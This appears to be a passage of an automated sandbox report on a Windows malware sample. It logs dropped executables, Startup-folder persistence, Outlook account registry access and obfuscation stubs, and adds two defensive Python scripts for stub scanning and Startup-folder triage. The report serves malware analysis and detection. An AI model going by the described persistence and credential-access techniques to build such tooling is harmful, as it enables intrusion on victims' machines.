                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: samcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: msi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: pstorec.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: ieframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: mlang.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: samlib.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: dlnashext.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: wpdshext.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: msvcp60.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: samcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: msi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: pstorec.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: ieframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: mlang.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: samlib.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                    Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

                    Data Obfuscation

                    Source: Yara match | File source: file.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000000.2049993958.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000003.2285813255.00000000046A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\SGS.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe, type: DROPPED
                    Source: Yara match | File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,5_2_00410065
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019BF0C pushad ; retn 0019h 0_2_0019BF0D
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019EE5B pushad ; ret 0_2_0019EE8C
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_042FFF86 push B3F78F00h; retf 0000h 0_2_042FFF8F
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019ED03 pushad ; ret 2_2_0019ED34
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019CF30 push esp; iretd 2_2_0019CF31
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019C9A0 push E86FEAB0h; retf 2_2_0019C9A5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019C258 pushad ; ret 2_2_0019C259
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019C95C push E86FEAB0h; retf 2_2_0019C961
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019CA1E push eax; retf 0019h 9_2_0019CA35
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019CA00 push eax; retf 0019h 9_2_0019CA01
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019CA3C push eax; retf 0019h 9_2_0019CA3D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019C325 push esp; ret 9_2_0019C32D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019EE5B pushad ; ret 9_2_0019EE8C
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019C9F0 push eax; retf 0019h 9_2_0019C9F1
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 10_2_0019ED03 pushad ; ret 10_2_0019ED34
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 10_2_0019C9A0 push E86FEAB0h; retf 10_2_0019C9A5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 10_2_0019C95C push E86FEAB0h; retf 10_2_0019C961
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 10_2_0019CF6C push esp; iretd 10_2_0019CF75
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00412850 push eax; ret 11_2_0041286E
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00412880 push eax; ret 11_2_004128AE
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040D342 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040D342
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe
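The push/retf and pushad/ret sequences listed above are the stubs a linear disassembler trips over: a `retf` straight after a single `push imm32` pops the pushed value as EIP and whatever lies above it on the stack as CS, which no compiler emits, so these are junk bytes or anti-disassembly rather than real transfers. The scanner below is an added example, not part of the Joe Sandbox report or of the sample's code: it finds the same opcode sequences in a raw code buffer. SAMPLE is a constructed buffer that embeds the instruction text reported above at made-up offsets; the pattern labels and the REG32 table are this example's own.

```python
"""Static scan for the push/ret-style control-flow stubs that the sandbox
lists under Data Obfuscation (e.g. "push E86FEAB0h; retf", "pushad ; ret",
"push eax; retf 0019h", "push esp; iretd").

Added example, not part of the Joe Sandbox report.  SAMPLE is a constructed
byte buffer: the stubs in it copy the instruction text the report lists,
but the offsets and surrounding bytes are made up for illustration.
"""
import re
import struct
from typing import List, Tuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# (label, byte pattern).  Opcodes: 68 imm32 = push imm32, 60 = pushad,
# 50..57 = push r32, C3 = ret, C2 imm16 = retn imm16, CB = retf,
# CA imm16 = retf imm16, CF = iretd.  Groups capture the immediates/register.
STUB_PATTERNS = [
    ("push imm32; retf",       re.compile(rb"\x68(.{4})\xCB", re.S)),
    ("push imm32; retf imm16", re.compile(rb"\x68(.{4})\xCA(.{2})", re.S)),
    ("pushad; ret",            re.compile(rb"\x60\xC3", re.S)),
    ("pushad; retn imm16",     re.compile(rb"\x60\xC2(.{2})", re.S)),
    ("push r32; ret",          re.compile(rb"([\x50-\x57])\xC3", re.S)),
    ("push r32; retf imm16",   re.compile(rb"([\x50-\x57])\xCA(.{2})", re.S)),
    ("push esp; iretd",        re.compile(rb"\x54\xCF", re.S)),
]


def find_stubs(code: bytes, base: int = 0) -> List[Tuple[int, str, str]]:
    """Return (address, pattern label, rendered instructions) for every
    candidate stub in `code`, sorted by address.  This is a linear byte scan,
    not a disassembly: a hit may sit inside the operand of another
    instruction, so confirm each one in a disassembler before acting on it."""
    hits = []
    for label, pat in STUB_PATTERNS:
        head, tail = label.split("; ")
        for m in pat.finditer(code):
            groups = m.groups()
            if head == "push imm32":
                head_text = f"push {struct.unpack('<I', groups[0])[0]:08X}h"
            elif head == "push r32":
                head_text = f"push {REG32[groups[0][0] - 0x50]}"
            else:
                head_text = head
            tail_text = tail
            if tail.endswith("imm16"):
                imm16 = struct.unpack("<H", groups[-1])[0]
                tail_text = tail.replace("imm16", f"{imm16:04X}h")
            hits.append((base + m.start(), label, f"{head_text}; {tail_text}"))
    return sorted(hits)


# Constructed buffer: benign filler around four stubs copied from the report's
# instruction text.  Expected hits at offsets 2, 9, 13 and 17.
SAMPLE = bytes.fromhex(
    "33C0"            # xor eax, eax                 (filler)
    "68B0EA6FE8CB"    # push E86FEAB0h; retf         (stub)
    "90"              # nop
    "60C21900"        # pushad; retn 0019h           (stub)
    "50CA1900"        # push eax; retf 0019h         (stub)
    "54CF"            # push esp; iretd              (stub)
    "B8010000005DC3"  # mov eax, 1; pop ebp; ret     (normal epilogue, no hit)
)


if __name__ == "__main__":
    for addr, label, text in find_stubs(SAMPLE, base=0x19C000):
        print(f"{addr:08X}  {text:<24} [{label}]")
```

A byte scan also hits inside operands and data, so use it to pick the functions worth opening in a disassembler, not as a verdict on its own.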

                    Boot Survival

                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe\:Zone.Identifier:$DATA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_004109EF OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004109EF
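Boot Survival here is the plain Startup-folder copy: anything under %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup runs at logon, and a Zone.Identifier stream is written beside the copy, which a download through urlmon (the dropped binary calls URLDownloadToFileW) produces as a side effect, so the mark-of-the-web on its own says little about where the file came from. The triage script below is an added example, not from the report: it lists the folder, confirms PE files by header rather than by extension, and reads the ZoneId when an NTFS stream is present. STARTUP_DIR, demo() and the fake PE it writes are this example's constructs.

```python
"""Triage a Startup folder for dropped executables, as in the Boot Survival
entries above (file.exe copied to ...\\Start Menu\\Programs\\Startup and a
Zone.Identifier stream written next to it).

Added example, not from the report.  demo() builds a constructed folder with
a minimal fake PE so the code runs anywhere; on a real host point
triage_startup() at STARTUP_DIR.
"""
import os
import struct
import tempfile
from typing import Dict, Optional

STARTUP_DIR = os.path.expandvars(
    r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup")


def is_pe(path: str) -> bool:
    """True if the file starts with an MZ header whose e_lfanew points at a
    PE signature; the extension is ignored on purpose."""
    try:
        with open(path, "rb") as f:
            head = f.read(0x40)
            if len(head) < 0x40 or head[:2] != b"MZ":
                return False
            e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
            f.seek(e_lfanew)
            return f.read(4) == b"PE\0\0"
    except OSError:
        return False


def zone_id(path: str) -> Optional[int]:
    """ZoneId from the Zone.Identifier alternate data stream (NTFS only;
    3 = Internet).  None if the stream is absent or the filesystem has no ADS."""
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as f:
            for line in f:
                key, _, value = line.strip().partition("=")
                if key.strip().lower() == "zoneid":
                    return int(value.strip())
    except (OSError, ValueError):
        return None
    return None


def triage_startup(folder: str) -> Dict[str, dict]:
    """Map each regular file in `folder` to {pe, zone, size}."""
    result = {}
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        if os.path.isfile(path):
            result[name] = {"pe": is_pe(path), "zone": zone_id(path),
                            "size": os.path.getsize(path)}
    return result


def fake_pe() -> bytes:
    """Constructed minimal PE prefix: MZ header, e_lfanew = 0x40, PE signature."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\0\0" + b"\0" * 20          # 88 bytes in total


def demo() -> Dict[str, dict]:
    """Constructed Startup folder: one dropped PE and one harmless text file."""
    folder = tempfile.mkdtemp(prefix="startup_")
    with open(os.path.join(folder, "file.exe"), "wb") as f:
        f.write(fake_pe())
    with open(os.path.join(folder, "desktop.ini"), "w") as f:
        f.write("[.ShellClassInfo]\n")
    return triage_startup(folder)


if __name__ == "__main__":
    for name, info in demo().items():
        flag = "PE" if info["pe"] else "--"
        print(f"{flag} zone={info['zone']} {name} ({info['size']} bytes)")
```

On a live host run `triage_startup(STARTUP_DIR)` and treat any PE there as suspect regardless of its ZoneId; the sample's copy would have a stream because the dropper fetched it, while a binary copied in locally would have none.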

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | File dump: 5234062.bat.5.dr 3880EEB1C736D853EB13B44898B718AB
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | File dump: 5249171.bat.12.dr 3880EEB1C736D853EB13B44898B718AB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00409008 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,11_2_00409008
                    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process information set: NOOPENFILEERRORBOX
